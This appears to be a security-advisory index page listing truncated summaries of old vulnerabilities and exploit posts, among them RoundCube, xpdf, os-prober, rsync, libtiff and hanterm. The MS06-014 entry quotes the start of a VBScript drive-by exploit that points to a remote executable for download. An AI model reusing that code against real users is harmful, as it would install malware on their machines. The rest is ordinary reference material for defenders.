DSA-1790-1 xpdf - multiple vulnerabilities

Bulletin has no description...

RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability

No description provided by source. Public Release Date of POC: 2008-12-22 Author: Jacobo Avariento Gimeno Sofistic CVE id: CVE-2008-5619 Bugtraq id: 32799 Severity: Critical Vulnerability reported by: RealMurphy Intro ---- Roundcube Webmail is a browser-based IMAP client that uses "chuggnutt.com...

Design/Logic Flaw

os-prober in os-prober 1.17 allows local users to overwrite arbitrary files via a symlink attack on the 1 /tmp/mounted-map or 2 /tmp/raided-map temporary file. NOTE: the vendor disputes this issue, stating "the insecure code path should only ever run inside a d-i environment, which has no non-roo...

Debian Security Advisory DSA 106-1 (rsync)

The remote host is missing an update to rsync announced via advisory DSA 106-1. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications =================================================================== WORK system e-commerce = 3.0.5 Remote File Inclusion Vulnerability =================================================================== Rodrigo Duarte WORK system e-commerc...

Fedora Core 5 : libtiff-3.7.4-6 (2006-592)

The tiffsplit command contained code that handled fixed-size buffers insecurely, possibly leading to stack overflows. This problem is fixed in the updated package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable...

MS06014 net horse of a modification of the method-vulnerability warning-the black bar safety net

MS06014 net horse of a modification of the method By the constant QQ: 5 4 5 4 4 4 3 Look at the original code script language="VBScript" on error resume next dl = "http://www.baidu.com/heng.exe" Set df = document. createElement"object" df. setAttribute "classid",...

flex: Potential insecure code generation

Background flex is a programming tool used to generate scanners programs which recognize lexical patterns in text. Description Chris Moore discovered a buffer overflow in a special class of lexicographical scanners generated by flex. Only scanners generated by grammars which use either REJECT, or...

Debian DSA-862-1 : ruby1.6 - programming error

Yutaka Oiwa discovered a bug in Ruby, the interpreter for the object-oriented scripting language, that can cause illegal program code to bypass the safe level and taint flag protections check and be executed. The following matrix lists the fixed versions in our distributions : old stable woody...

dcl15.txt

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: Download Center Lite DCL Version: Location: Poland Email: groszynskif gmail com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --...

Overflow Vulnerabilities in hanterm

Hi,I'm xperc. hanterm is Hangul terminal for X. it is based on the xterm in XFree86. The hanterm binary is default installed with setuid root permissions for TurboLinux Server 6.5. but contains insecure code with allows unprivileged local users to obtain root access on the local system. $which...

Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool

Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool source: https://www.securityfocus.com/bid/1563/info Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems GIS, satellite imaging, pre-press imaging and general desktop use...